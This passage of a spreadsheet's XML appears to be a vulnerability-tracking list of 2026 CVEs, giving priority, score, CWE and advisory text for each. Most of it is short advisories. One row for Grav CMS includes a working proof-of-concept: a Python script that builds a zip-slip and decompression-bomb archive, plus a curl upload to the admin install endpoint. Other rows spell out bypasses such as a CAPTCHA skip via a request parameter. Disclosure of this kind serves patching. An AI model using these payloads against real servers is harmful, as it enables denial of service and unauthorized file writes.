    <row r="823">
      <c r="A823" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B823" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C823" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85628</t>
        </is>
      </c>
      <c r="D823" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E823" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F823" s="5" t="inlineStr">
        <is>
          <t>539080bd-5750-4cce-b30b-eed9a4ef6dcc</t>
        </is>
      </c>
      <c r="G823" s="5" t="inlineStr"/>
      <c r="H823" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I823" s="5" t="inlineStr"/>
      <c r="J823" s="5" t="inlineStr"/>
      <c r="K823" s="5" t="inlineStr"/>
      <c r="L823" s="5" t="inlineStr"/>
      <c r="M823" s="5" t="inlineStr"/>
      <c r="N823" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O823" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P823" s="5" t="inlineStr"/>
      <c r="Q823" s="5" t="inlineStr">
        <is>
          <t>CWE-319</t>
        </is>
      </c>
      <c r="R823" s="5" t="inlineStr">
        <is>
          <t>Transmission of the home Wi-Fi credentials without encryption during the pairing process between the DuoxMe application and VEO and VEO-XS Wi-Fi monitors, in versions prior to 4.3.4 of the application and 01.50.001 of the monitor firmware, allows an attacker on the Wi-Fi Direct network to intercept the network password.</t>
        </is>
      </c>
      <c r="S823" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85628</t>
        </is>
      </c>
    </row>
    <row r="824">
      <c r="A824" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B824" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C824" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87088</t>
        </is>
      </c>
      <c r="D824" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E824" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F824" s="5" t="inlineStr">
        <is>
          <t>3938794e-25f5-4123-a1ba-5cbd7f104512</t>
        </is>
      </c>
      <c r="G824" s="5" t="inlineStr"/>
      <c r="H824" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I824" s="5" t="inlineStr"/>
      <c r="J824" s="5" t="inlineStr"/>
      <c r="K824" s="5" t="inlineStr">
        <is>
          <t>tanium:enforce</t>
        </is>
      </c>
      <c r="L824" s="5" t="inlineStr"/>
      <c r="M824" s="5" t="inlineStr"/>
      <c r="N824" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O824" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P824" s="5" t="inlineStr"/>
      <c r="Q824" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R824" s="5" t="inlineStr">
        <is>
          <t>Tanium addressed an unauthorized code execution vulnerability in Enforce.</t>
        </is>
      </c>
      <c r="S824" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87088</t>
        </is>
      </c>
    </row>
    <row r="825">
      <c r="A825" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B825" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C825" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-91097</t>
        </is>
      </c>
      <c r="D825" s="5" t="n">
        <v>7</v>
      </c>
      <c r="E825" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F825" s="5" t="inlineStr">
        <is>
          <t>hp-security-alert@hp.com</t>
        </is>
      </c>
      <c r="G825" s="5" t="inlineStr"/>
      <c r="H825" s="5" t="inlineStr"/>
      <c r="I825" s="5" t="inlineStr"/>
      <c r="J825" s="5" t="inlineStr"/>
      <c r="K825" s="5" t="inlineStr"/>
      <c r="L825" s="5" t="inlineStr"/>
      <c r="M825" s="5" t="inlineStr"/>
      <c r="N825" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O825" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P825" s="5" t="inlineStr"/>
      <c r="Q825" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R825" s="5" t="inlineStr">
        <is>
          <t>HP has identified and remediated multiple externally reported vulnerabilities within HPLIP. The findings affect several software components that could potentially enable remote code execution, privilege escalation, denial of service, information disclosure, or unauthorized file modification under certain conditions.</t>
        </is>
      </c>
      <c r="S825" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-91097</t>
        </is>
      </c>
    </row>
    <row r="826">
      <c r="A826" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B826" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C826" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59193</t>
        </is>
      </c>
      <c r="D826" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E826" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F826" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G826" s="5" t="inlineStr"/>
      <c r="H826" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I826" s="5" t="inlineStr"/>
      <c r="J826" s="5" t="inlineStr"/>
      <c r="K826" s="5" t="inlineStr"/>
      <c r="L826" s="5" t="inlineStr">
        <is>
          <t>composer:getgrav/grav</t>
        </is>
      </c>
      <c r="M826" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N826" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O826" s="5" t="inlineStr"/>
      <c r="P826" s="5" t="inlineStr"/>
      <c r="Q826" s="5" t="inlineStr">
        <is>
          <t>CWE-409</t>
        </is>
      </c>
      <c r="R826" s="5" t="inlineStr">
        <is>
          <t>### Summary
An authenticated admin.super user can crash Grav or fill the disk by uploading a specially crafted ZIP archive through the Direct Install tool. The method `Installer::unZip()` calls `ZipArchive::extractTo()` without any limit on uncompressed size, entry count, or directory depth, enabling Zip Bomb (CWE-409), stack overflow (CWE-674), and disk/inode exhaustion.
### Details
The vulnerability is in `system/src/Grav/Common/GPM/Installer.php:176-208` (`Installer::unZip()`). The `ZipArchive::extractTo()` call at line 184 is not preceded by any validation of the archive contents.
Missing validation:
- ❌ No total uncompressed size check (decompression bomb — CWE-409)
- ❌ No entry count check (inode exhaustion)
- ❌ No directory nesting depth check (stack overflow in `Folder::doDelete()` — CWE-674)
The subsequent cleanup call `Folder::delete($destination)` at line 189 recursively deletes every subdirectory without depth limit (`Folder.php:531-547`). A ZIP with thousands of nested directories will cause PHP's maximum nesting level to be exceeded, so the cleanup fails silently and leaves extracted files on disk.
The existing Zip Slip fix (GHSA-w48r-jppp-rcfw / CVE-2026-42607, commit 5a12f9be8) only checks for `../` in entry paths and does not add any size, count, or depth limits.
### PoC
1. Generate the malicious ZIP:
   python3 cve_poc_grav_zip.py:
```python
#!/usr/bin/env python3
"""
CVE PoC — Grav CMS Installer::unZip()
Zip Bomb + Zip Slip + Deep Nesting
ZIP file to attach to the CVE advisory.
Note: Zip Slip (../) already has CVE-2026-42607. This PoC targets the Zip Bomb (CWE-409)
which has NO CVE — extracted size/depth/count have no limits.
"""
import zipfile, os, sys
OUT = "/tmp/cve_poc_grav.zip"
def build():
    with zipfile.ZipFile(OUT, 'w', zipfile.ZIP_DEFLATED) as z:
        # --- Zip Slip: arbitrary write outside target ---
        z.writestr("../../../tmp/CVE_POC_SLIP", "ZIP SLIP: writes outside target\n")
        # --- Deep nesting: 100 levels → Folder::delete() has no depth limit ---
        for i in range(100):
            z.writestr(f"deep/{'x/' * i}.keep", "")
        # --- Compression bomb: 100 identical files = ratio ~ 196:1 ---
        for i in range(100):
            z.writestr(f"bomb/{i}.dat", b"A" * 100_000)
    with zipfile.ZipFile(OUT) as z:
        infos = z.infolist()
        compressed = os.path.getsize(OUT)
        uncompressed = sum(e.file_size for e in infos)
        slip = any(".." in e.filename for e in infos)
        depths = [e.filename.count('/') for e in infos]
    print("=" * 60)
    print("CVE PoC — Grav CMS Installer::unZip()")
    print("Zip Bomb | Zip Slip | Deep Nesting")
    print("=" * 60)
    print(f"File           : {OUT}")
    print(f"ZIP size       : {compressed:,} B ({compressed/1024:.1f} KB)")
    print(f"Uncompressed   : {uncompressed:,} B ({uncompressed/1024/1024:.1f} MB)")
    print(f"Ratio          : {uncompressed/compressed:.0f}:1")
    print(f"Entries        : {len(infos)}")
    print(f"Max depth      : {max(depths) if depths else 0}")
    print(f"Zip Slip (../) : {'YES' if slip else 'NO'}")
    print(f"\nUpload via Grav Admin → /admin/tools/direct-install?task=directInstall")
    print(f"Result: disk exhaustion + Folder::delete() stack overflow + arbitrary write")
if __name__ == "__main__":
    build()
```
3. Authenticate as admin.super and retrieve the nonce from /admin
4. Upload through Direct Install:
```
   curl -X POST 'https://target/admin/tools/direct-install?task=directInstall' \
     -H 'Cookie: grav-admin=&lt;SESSION&gt;' \
     -F 'admin-nonce=&lt;NONCE&gt;' \
     -F 'uploaded_file=@/tmp/cve_poc_grav.zip'
```
Result: server extracts all entries (9.5 MB → 200 files + 100 nesting levels). The cleanup crashes with "Maximum function nesting level reached" due to 100-level deep recursion.
### Impact
An authenticated administrator (admin.super) can:
- Fill the server disk with highly compressed data (196:1 ratio with simple repeating data, up to 10^11:1 with nested ZIP bombs)
- Exhaust inodes via thousands of small files
- Trigger a PHP stack overflow via deep directory nesting that prevents cleanup, leaving files on disk permanently
- Partially or fully deny service to all users (both authenticated and unauthenticated)</t>
        </is>
      </c>
      <c r="S826" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59193</t>
        </is>
      </c>
    </row>
    <row r="827">
      <c r="A827" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B827" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C827" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73445</t>
        </is>
      </c>
      <c r="D827" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E827" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F827" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G827" s="5" t="inlineStr"/>
      <c r="H827" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I827" s="5" t="inlineStr"/>
      <c r="J827" s="5" t="inlineStr"/>
      <c r="K827" s="5" t="inlineStr"/>
      <c r="L827" s="5" t="inlineStr"/>
      <c r="M827" s="5" t="inlineStr"/>
      <c r="N827" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O827" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P827" s="5" t="inlineStr"/>
      <c r="Q827" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R827" s="5" t="inlineStr">
        <is>
          <t>On affected platforms running Arista EOS, an issue with the gRPC Network Security Interface (gNSI) Authz Rotate RPC may cause an incorrect Authz policy which was uploaded in the ongoing RPC stream to become active. This does not affect Bootz.
This issue was discovered internally by Arista and the company is not aware of any malicious uses of this issue in customer networks.</t>
        </is>
      </c>
      <c r="S827" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73445</t>
        </is>
      </c>
    </row>
    <row r="828">
      <c r="A828" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B828" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C828" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73469</t>
        </is>
      </c>
      <c r="D828" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E828" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F828" s="5" t="inlineStr">
        <is>
          <t>psirt@arista.com</t>
        </is>
      </c>
      <c r="G828" s="5" t="inlineStr"/>
      <c r="H828" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I828" s="5" t="inlineStr"/>
      <c r="J828" s="5" t="inlineStr"/>
      <c r="K828" s="5" t="inlineStr"/>
      <c r="L828" s="5" t="inlineStr"/>
      <c r="M828" s="5" t="inlineStr"/>
      <c r="N828" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O828" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P828" s="5" t="inlineStr"/>
      <c r="Q828" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="R828" s="5" t="inlineStr">
        <is>
          <t>When specific platforms are using Arista EOS with a loose Unicast Reverse Path Forwarding (uRPF) configuration, certain traffic may not be subjected to the intended verification drop. Consequently, traffic that should be dropped based on these routes could still be processed and forwarded by the device.
This issue was discovered internally by Arista and the company is not aware of any malicious uses of this issue in customer networks.</t>
        </is>
      </c>
      <c r="S828" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73469</t>
        </is>
      </c>
    </row>
    <row r="829">
      <c r="A829" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B829" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C829" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79700</t>
        </is>
      </c>
      <c r="D829" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E829" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F829" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G829" s="5" t="inlineStr"/>
      <c r="H829" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I829" s="5" t="inlineStr"/>
      <c r="J829" s="5" t="inlineStr"/>
      <c r="K829" s="5" t="inlineStr"/>
      <c r="L829" s="5" t="inlineStr"/>
      <c r="M829" s="5" t="inlineStr"/>
      <c r="N829" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O829" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P829" s="5" t="inlineStr"/>
      <c r="Q829" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R829" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Unauthenticated CAPTCHA Bypass via Request-Controlled CAPTCHA Configuration in SP Page Builder Pro 5.1.4 - 6.9.0 - The optin_form addon read the CAPTCHA type, the expected answer and the enabled flag from the request rather than from the stored addon configuration. Verification reduced to md5($captcha_question) != $captcha_answer with both operands supplied by the attacker, so any value passed.</t>
        </is>
      </c>
      <c r="S829" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79700</t>
        </is>
      </c>
    </row>
    <row r="830">
      <c r="A830" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B830" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C830" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-79701</t>
        </is>
      </c>
      <c r="D830" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E830" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F830" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G830" s="5" t="inlineStr"/>
      <c r="H830" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I830" s="5" t="inlineStr"/>
      <c r="J830" s="5" t="inlineStr"/>
      <c r="K830" s="5" t="inlineStr"/>
      <c r="L830" s="5" t="inlineStr"/>
      <c r="M830" s="5" t="inlineStr"/>
      <c r="N830" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O830" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P830" s="5" t="inlineStr"/>
      <c r="Q830" s="5" t="inlineStr">
        <is>
          <t>CWE-807</t>
        </is>
      </c>
      <c r="R830" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Unauthenticated CAPTCHA Bypass in Module Context in the Contact, Opt-in and Form Builder Addons in SP Page Builder Pro 3.2.6 - 6.9.0 - In the ajax_contact, optin_form and form_builder addons, the result returned by the CAPTCHA plugin's onCheckAnswer event was discarded and replaced with a test for a non-empty string whenever the request-supplied view_type parameter equalled module. Submitting view_type=module together with any arbitrary token value therefore passed verification. This affected every instance of these addons placed inside an SP Page Builder module, irrespective of the CAPTCHA type configured for the site, and the view_type parameter was never validated against the context in which the form was actually rendered.</t>
        </is>
      </c>
      <c r="S830" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-79701</t>
        </is>
      </c>
    </row>
    <row r="831">
      <c r="A831" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B831" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C831" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81565</t>
        </is>
      </c>
      <c r="D831" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E831" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F831" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G831" s="5" t="inlineStr"/>
      <c r="H831" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I831" s="5" t="inlineStr"/>
      <c r="J831" s="5" t="inlineStr"/>
      <c r="K831" s="5" t="inlineStr"/>
      <c r="L831" s="5" t="inlineStr"/>
      <c r="M831" s="5" t="inlineStr"/>
      <c r="N831" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O831" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P831" s="5" t="inlineStr"/>
      <c r="Q831" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R831" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - joomshaper.com - Missing Directory Confinement in Media Upload in SP Page Builder (Free and Pro) 4.0.0 - 6.9.0 - The folder request parameter replaced the generated date-based destination folder in its entirety and was then passed to Folder::create() and File::upload() without either of the directory boundary checks applied elsewhere in the same file. Files could be written into any directory beneath the web root, including administrator/, templates/, cli/ and the site root. Joomla's PATH input filter prevented traversal above the web root, and existing files were not overwritten.</t>
        </is>
      </c>
      <c r="S831" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81565</t>
        </is>
      </c>
    </row>
    <row r="832">
      <c r="A832" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B832" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C832" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82784</t>
        </is>
      </c>
      <c r="D832" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E832" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F832" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G832" s="5" t="inlineStr"/>
      <c r="H832" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I832" s="5" t="inlineStr"/>
      <c r="J832" s="5" t="inlineStr"/>
      <c r="K832" s="5" t="inlineStr"/>
      <c r="L832" s="5" t="inlineStr"/>
      <c r="M832" s="5" t="inlineStr"/>
      <c r="N832" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O832" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P832" s="5" t="inlineStr"/>
      <c r="Q832" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="R832" s="5" t="inlineStr">
        <is>
          <t>Missing authentication for critical function vulnerability exists in Remote I/O Coupler Unit (Server Type) CPSN-MCB271-*. An attacker may execute a REST API without authentication, which could allow the attacker to retrieve I/O values and/or control the output.</t>
        </is>
      </c>
      <c r="S832" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82784</t>
        </is>
      </c>
    </row>
    <row r="833">
      <c r="A833" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B833" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C833" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85188</t>
        </is>
      </c>
      <c r="D833" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E833" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F833" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G833" s="5" t="inlineStr"/>
      <c r="H833" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I833" s="5" t="inlineStr"/>
      <c r="J833" s="5" t="inlineStr"/>
      <c r="K833" s="5" t="inlineStr"/>
      <c r="L833" s="5" t="inlineStr"/>
      <c r="M833" s="5" t="inlineStr"/>
      <c r="N833" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O833" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P833" s="5" t="inlineStr"/>
      <c r="Q833" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R833" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - regularlabs.com - Database data disclosure in Advanced Module Manager (Free, Pro) &lt; 12.1.0, Conditional Content (Free, Pro) &lt; 8.0.0, Content Templater (Pro) &lt; 14.2.0, ReReplacer (Pro) &lt; 16.2.0 for Joomla - The Conditions editor creates a default Condition Set name from the item to which the set is linked. The affected code accepts the database table and label-column names from the request. Although these names are quoted as SQL identifiers, they are not restricted to the tables and columns used by supported Regular Labs integrations. An attacker can therefore select a valid but unrelated database field. This is an authorization failure rather than SQL injection.</t>
        </is>
      </c>
      <c r="S833" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85188</t>
        </is>
      </c>
    </row>
    <row r="834">
      <c r="A834" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B834" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C834" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86443</t>
        </is>
      </c>
      <c r="D834" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E834" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F834" s="5" t="inlineStr">
        <is>
          <t>539080bd-5750-4cce-b30b-eed9a4ef6dcc</t>
        </is>
      </c>
      <c r="G834" s="5" t="inlineStr"/>
      <c r="H834" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I834" s="5" t="inlineStr"/>
      <c r="J834" s="5" t="inlineStr"/>
      <c r="K834" s="5" t="inlineStr"/>
      <c r="L834" s="5" t="inlineStr"/>
      <c r="M834" s="5" t="inlineStr"/>
      <c r="N834" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O834" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P834" s="5" t="inlineStr"/>
      <c r="Q834" s="5" t="inlineStr">
        <is>
          <t>CWE-312</t>
        </is>
      </c>
      <c r="R834" s="5" t="inlineStr">
        <is>
          <t>Cleartext storage of sensitive information in the DuoxMe application for Android, in versions prior to 4.3.4, allows an attacker with local access to the device to retrieve the credentials stored by the application and impersonate the user account.</t>
        </is>
      </c>
      <c r="S834" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86443</t>
        </is>
      </c>
    </row>
    <row r="835">
      <c r="A835" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B835" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C835" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87727</t>
        </is>
      </c>
      <c r="D835" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E835" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F835" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G835" s="5" t="inlineStr"/>
      <c r="H835" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I835" s="5" t="inlineStr"/>
      <c r="J835" s="5" t="inlineStr"/>
      <c r="K835" s="5" t="inlineStr"/>
      <c r="L835" s="5" t="inlineStr"/>
      <c r="M835" s="5" t="inlineStr"/>
      <c r="N835" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O835" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P835" s="5" t="inlineStr"/>
      <c r="Q835" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R835" s="5" t="inlineStr">
        <is>
          <t>a-blog cms Ver. 3.2.33 and earlier contains a path traversal vulnerability, which allows an unauthenticated attacker to read or delete arbitrary files on the affected product.</t>
        </is>
      </c>
      <c r="S835" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87727</t>
        </is>
      </c>
    </row>
    <row r="836">
      <c r="A836" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B836" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C836" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89021</t>
        </is>
      </c>
      <c r="D836" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E836" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F836" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G836" s="5" t="inlineStr"/>
      <c r="H836" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I836" s="5" t="inlineStr"/>
      <c r="J836" s="5" t="inlineStr"/>
      <c r="K836" s="5" t="inlineStr"/>
      <c r="L836" s="5" t="inlineStr"/>
      <c r="M836" s="5" t="inlineStr"/>
      <c r="N836" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O836" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="P836" s="5" t="inlineStr"/>
      <c r="Q836" s="5" t="inlineStr">
        <is>
          <t>CWE-22, CWE-59</t>
        </is>
      </c>
      <c r="R836" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS before 7.24.2 contains a path traversal vulnerability in the container package OCI/tar image extraction that allows attackers to write files outside the container root by supplying a crafted container image with symlinks pointing to arbitrary paths. Attackers can exploit unsanitized tar member path extraction during container import via /container/add to achieve root-privileged file creation, directory creation, file deletion via overlayfs whiteout, and hardlink creation on the persistent data partition without ever starting the container. The 7.23.x long-term branch does not contain this fix; the container binaries in container-7.23.3.npk and container-7.23.4.npk are byte-identical, and there is no fixed long-term release at the time of publication.</t>
        </is>
      </c>
      <c r="S836" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89021</t>
        </is>
      </c>
    </row>
    <row r="837">
      <c r="A837" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B837" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C837" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89207</t>
        </is>
      </c>
      <c r="D837" s="5" t="n">
        <v>6.9</v>
      </c>
      <c r="E837" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F837" s="5" t="inlineStr">
        <is>
          <t>productcert@siemens.com</t>
        </is>
      </c>
      <c r="G837" s="5" t="inlineStr"/>
      <c r="H837" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I837" s="5" t="inlineStr"/>
      <c r="J837" s="5" t="inlineStr"/>
      <c r="K837" s="5" t="inlineStr"/>
      <c r="L837" s="5" t="inlineStr"/>
      <c r="M837" s="5" t="inlineStr"/>
      <c r="N837" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
